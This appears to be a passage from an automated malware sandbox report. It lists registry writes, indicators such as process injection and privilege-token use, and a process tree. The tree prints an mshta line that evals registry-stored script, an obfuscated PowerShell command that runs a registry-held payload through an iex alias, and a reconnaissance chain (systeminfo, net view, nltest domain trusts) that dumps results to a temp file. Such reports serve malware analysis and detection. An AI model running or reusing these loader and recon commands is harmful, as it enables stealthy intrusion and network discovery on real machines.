\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000008235eb92ca7d801d46fc9b92ca7d801d46fc9b92ca7d801908e06000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355115c2000613133313765333937613733663438643164653337316665663065666561653430653539613064343466663639356264303031646164393033303736383735360000b20009000400efbe0355115c0355115c2e000000000000000000000000000000000000000000000000000cb98a00610031003300310037006500330039003700610037003300660034003800640031006400650033003700310066006500660030006500660065006100650034003000650035003900610030006400340034006600660036003900350062006400300030003100640061006400390030003300300037003600380037003500360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008a22f97a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61313331376533393761373366343864316465333731666566306566656165343065353961306434346666363935626430303164616439303330373638373536000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a7014d89cea08ed11b78d56b8b6dcaeaebca7cefcc5848241ae2fb45b654f157a7014d89cea08ed11b78d56b8b6dcaeaece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = 89f7dbb82ca7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = 2c6f06ba2ca7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = 153bf3b82ca7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = 4977f7b92ca7d801 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = 442216b92ca7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "0" RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 4556 regsvr32.exe 4556 regsvr32.exe 4384 powershell.exe 4384 powershell.exe 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2648 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEpid process 4384 powershell.exe 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE 2648 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exeRuntimeBroker.exetasklist.exedescription pid process Token: SeDebugPrivilege 4384 powershell.exe Token: SeShutdownPrivilege 2648 Explorer.EXE Token: SeCreatePagefilePrivilege 2648 Explorer.EXE Token: SeIncreaseQuotaPrivilege 5064 WMIC.exe Token: SeSecurityPrivilege 5064 WMIC.exe Token: SeTakeOwnershipPrivilege 5064 WMIC.exe Token: SeLoadDriverPrivilege 5064 WMIC.exe Token: SeSystemProfilePrivilege 5064 WMIC.exe Token: SeSystemtimePrivilege 5064 WMIC.exe Token: SeProfSingleProcessPrivilege 5064 WMIC.exe Token: SeIncBasePriorityPrivilege 5064 WMIC.exe Token: SeCreatePagefilePrivilege 5064 WMIC.exe Token: SeBackupPrivilege 5064 WMIC.exe Token: SeRestorePrivilege 5064 WMIC.exe Token: SeShutdownPrivilege 5064 WMIC.exe Token: SeDebugPrivilege 5064 WMIC.exe Token: SeSystemEnvironmentPrivilege 5064 WMIC.exe Token: SeRemoteShutdownPrivilege 5064 WMIC.exe Token: SeUndockPrivilege 5064 WMIC.exe Token: SeManageVolumePrivilege 5064 WMIC.exe Token: 33 5064 WMIC.exe Token: 34 5064 WMIC.exe Token: 35 5064 WMIC.exe Token: 36 5064 WMIC.exe Token: SeIncreaseQuotaPrivilege 5064 WMIC.exe Token: SeSecurityPrivilege 5064 WMIC.exe Token: SeTakeOwnershipPrivilege 5064 WMIC.exe Token: SeLoadDriverPrivilege 5064 WMIC.exe Token: SeSystemProfilePrivilege 5064 WMIC.exe Token: SeSystemtimePrivilege 5064 WMIC.exe Token: SeProfSingleProcessPrivilege 5064 WMIC.exe Token: SeIncBasePriorityPrivilege 5064 WMIC.exe Token: SeCreatePagefilePrivilege 5064 WMIC.exe Token: SeBackupPrivilege 5064 WMIC.exe Token: SeRestorePrivilege 5064 WMIC.exe Token: SeShutdownPrivilege 5064 WMIC.exe Token: SeDebugPrivilege 5064 WMIC.exe Token: SeSystemEnvironmentPrivilege 5064 WMIC.exe Token: SeRemoteShutdownPrivilege 5064 WMIC.exe Token: SeUndockPrivilege 5064 WMIC.exe Token: SeManageVolumePrivilege 5064 WMIC.exe Token: 33 5064 WMIC.exe Token: 34 5064 WMIC.exe Token: 35 5064 WMIC.exe Token: 36 5064 WMIC.exe Token: SeShutdownPrivilege 2648 Explorer.EXE Token: SeCreatePagefilePrivilege 2648 Explorer.EXE Token: SeShutdownPrivilege 3444 RuntimeBroker.exe Token: SeDebugPrivilege 4444 tasklist.exe Token: SeShutdownPrivilege 3444 RuntimeBroker.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2648 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.exedescription pid process target process PID 428 wrote to memory of 4556 428 regsvr32.exe regsvr32.exe PID 428 wrote to memory of 4556 428 regsvr32.exe regsvr32.exe PID 428 wrote to memory of 4556 428 regsvr32.exe regsvr32.exe PID 2216 wrote to memory of 4384 2216 mshta.exe powershell.exe PID 2216 wrote to memory of 4384 2216 mshta.exe powershell.exe PID 4384 wrote to memory of 4108 4384 powershell.exe csc.exe PID 4384 wrote to memory of 4108 4384 powershell.exe csc.exe PID 4108 wrote to memory of 3796 4108 csc.exe cvtres.exe PID 4108 wrote to memory of 3796 4108 csc.exe cvtres.exe PID 4384 wrote to memory of 3116 4384 powershell.exe csc.exe PID 4384 wrote to memory of 3116 4384 powershell.exe csc.exe PID 3116 wrote to memory of 3580 3116 csc.exe cvtres.exe PID 3116 wrote to memory of 3580 3116 csc.exe cvtres.exe PID 4384 wrote to memory of 2648 4384 powershell.exe Explorer.EXE PID 4384 wrote to memory of 2648 4384 powershell.exe Explorer.EXE PID 4384 wrote to memory of 2648 4384 powershell.exe Explorer.EXE PID 4384 wrote to memory of 2648 4384 powershell.exe Explorer.EXE PID 2648 wrote to memory of 3444 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3444 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3444 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3444 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3788 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3788 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3788 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 3788 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 4408 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 4408 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 4408 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 4408 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 5096 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 5096 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 5096 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 5096 2648 Explorer.EXE RuntimeBroker.exe PID 2648 wrote to memory of 4292 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 4292 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 4292 wrote to memory of 5064 4292 cmd.exe WMIC.exe PID 4292 wrote to memory of 5064 4292 cmd.exe WMIC.exe PID 4292 wrote to memory of 852 4292 cmd.exe more.com PID 4292 wrote to memory of 852 4292 cmd.exe more.com PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5000 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 1984 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 1984 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5060 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 5060 2648 Explorer.EXE cmd.exe PID 5060 wrote to memory of 384 5060 cmd.exe systeminfo.exe PID 5060 wrote to memory of 384 5060 cmd.exe systeminfo.exe PID 2648 wrote to memory of 656 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 656 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 612 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 612 2648 Explorer.EXE cmd.exe PID 612 wrote to memory of 4836 612 cmd.exe net.exe PID 612 wrote to memory of 4836 612 cmd.exe net.exe PID 2648 wrote to memory of 2040 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 2040 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 616 2648 Explorer.EXE cmd.exe PID 2648 wrote to memory of 616 2648 Explorer.EXE cmd.exe PID 616 wrote to memory of 4508 616 cmd.exe nslookup.exe PID 616 wrote to memory of 4508 616 cmd.exe nslookup.exe PID 2648 wrote to memory of 4624 2648 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:5096
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4408
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3788
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4556 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ytyk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ytyk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name idjndxe -value gp; new-alias -name bifqcj -value iex; bifqcj ([System.Text.Encoding]::ASCII.GetString((idjndxe "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP"5⤵PID:3796
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp" "c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP"5⤵PID:3580
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\more.commore3⤵PID:852
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5064 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:5000
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1984
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:656
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:4836 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:2040
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:4508
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:4624
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:2616
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:4208
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:4732
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:4616
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1768
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:3476
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:4604
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:596
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1976
-
C:\Windows\system32\net.exenet config workstation3⤵PID:3012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:2696
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:4904
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:428
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:332
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:2036
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:2456
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:2032
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1360
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"2⤵PID:1936
-
C:\Windows\system32\net.exenet view /all /domain3⤵
